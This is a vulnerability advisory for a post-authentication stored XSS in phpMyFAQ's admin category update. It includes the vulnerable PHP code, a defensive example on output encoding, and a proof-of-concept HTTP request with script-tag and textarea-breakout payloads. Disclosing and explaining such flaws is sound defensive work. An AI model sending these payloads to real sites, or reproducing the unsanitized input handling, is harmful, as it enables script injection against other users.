CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.


Description

The product does not neutralize, or incorrectly neutralizes, user-controllable input before placing it in output that is served as a web page to other users (CWE-79). In phpMyFAQ prior to 3.1.12 the admin updatecategory action reads the category name and description with FILTER_UNSAFE_RAW, so any HTML or script an authenticated admin user submits is stored unchanged and later rendered to other users of the FAQ. Note that the request must carry a valid admin session and a CSRF token for update-category (see the verifyToken check in the code and the csrf field in the request below), so this is post-authentication stored XSS.

Proof of Concept

Vulnerable code (the updatecategory branch; name and description are read with FILTER_UNSAFE_RAW and stored as-is):

            // Updates an existing category
            if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                $category = new Category($faqConfig, [], false);
                $category->setUser($currentAdminUser);
                $category->setGroups($currentAdminGroups);

                $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                $image = count($uploadedFile) ? $categoryImage->getFileName(
                    $categoryId,
                    $categoryLang
                ) : $existingImage;

                $categoryData = [
                    'id' => $categoryId,
                    'lang' => $categoryLang,
                    'parent_id' => $parentId,
                    'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                    'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                    'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                    'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                    'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                    'image' => $image,
                    'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                ];

For comparison, the sibling savecategory branch in the same file, which is not affected because it reads name and description with FILTER_SANITIZE_SPECIAL_CHARS:

            // Save a new category
            if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                $category = new Category($faqConfig, [], false);
                $category->setUser($currentAdminUser);
                $category->setGroups($currentAdminGroups);
                $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                $categoryData = [
                    'lang' => $categoryLang,
                    'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                    'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                    'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                    'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                    'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                    'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                    'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                ];
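
The following is an added example, not phpMyFAQ code, showing how the two filters used above treat the exact payloads from the PoC request, and why escaping at the render boundary is the check that holds regardless of what was stored. The helpers escapeHtml and renderEditForm are hypothetical; the inputs are the constructed name and description values from the request below.

```php
<?php
// Added example (not phpMyFAQ code): input filtering vs. output encoding for
// the payloads used in the PoC request on this page.

declare(strict_types=1);

// Constructed inputs: the name and description fields from the PoC request.
const PAYLOADS = [
    'name'        => '<script>alert(1)</script>',
    'description' => '</textarea><script>alert(2)</script>',
];

/**
 * Mimics the vulnerable updatecategory branch: FILTER_UNSAFE_RAW returns the
 * string untouched, so the markup reaches the database exactly as submitted.
 */
function readRaw(string $value): string
{
    return (string) filter_var($value, FILTER_UNSAFE_RAW);
}

/**
 * Mimics the savecategory branch: FILTER_SANITIZE_SPECIAL_CHARS replaces
 * ' " < > & and control characters with numeric entities before storage.
 */
function readSanitized(string $value): string
{
    return (string) filter_var($value, FILTER_SANITIZE_SPECIAL_CHARS);
}

/**
 * Hypothetical helper: output encoding at the render boundary. This is the
 * defence that works no matter what was stored, as long as every field is
 * escaped for the HTML context it is emitted into.
 */
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Hypothetical render of the edit-form fragment the PoC targets: the name
 * goes into a quoted attribute, the description into a textarea body. The
 * second payload's leading </textarea> is what breaks out of that body when
 * the value is emitted unescaped.
 */
function renderEditForm(array $category): string
{
    return '<input type="text" name="name" value="' . escapeHtml($category['name']) . '">' . "\n"
         . '<textarea name="description">' . escapeHtml($category['description']) . '</textarea>' . "\n";
}

foreach (PAYLOADS as $field => $payload) {
    printf("%-12s raw:       %s\n", $field, readRaw($payload));
    printf("%-12s sanitized: %s\n", $field, readSanitized($payload));
}

// What the vulnerable path stores (unchanged), rendered with output encoding.
$stored = array_map('readRaw', PAYLOADS);
echo renderEditForm($stored);
```

Running this prints the name payload unchanged for the raw path and as `&#60;script&#62;alert(1)&#60;/script&#62;` for the sanitized path; the rendered form shows both fields with `<` and `>` turned into `&lt;` and `&gt;`, so the `</textarea>` breakout never reaches the parser as a tag. Two caveats for anyone applying the same pattern: FILTER_SANITIZE_SPECIAL_CHARS encodes on the way in, so a template that also escapes on the way out will double-encode (the stored `&#60;` becomes `&amp;#60;` and the admin sees the entities literally), and entity encoding on input does nothing for non-HTML sinks such as JavaScript string literals or unquoted attributes. Pick one boundary, preferably output encoding per context, and apply it consistently.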

Request (authenticated admin session; the csrf field must carry a valid update-category token, otherwise the verifyToken check above rejects the update):

POST /admin/?action=updatecategory HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
Content-Length: 1934
Origin: https://roy.demo.phpmyfaq.de
Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="catlang"

en
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="parent_id"

0
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="csrf"

EDITthis
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="existing_image"


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="name"

<script>alert(1)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="description"

</textarea><script>alert(2)</script>
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="active"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="show_home"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="user_id"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="grouppermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="userpermission"

all
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="restricted_users"

1
-----------------------------14208207025422371582565391486
Content-Disposition: form-data; name="submit"


-----------------------------14208207025422371582565391486--

Impact

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, that data is read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is an area displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes the malicious content, the attacker may be able to perform privileged operations on behalf of that user or gain access to sensitive data belonging to them. For example, the attacker might inject XSS into a log message that is not handled properly when an administrator views the logs. Here the injection point is a category name and description, which are shown both in the admin category editor and wherever categories are listed in the FAQ.

Related news

GHSA-m9qm-m5w5-9pgj: thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via updatecategory parameter

thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the updatecategory parameter. This has been fixed in 3.1.12.
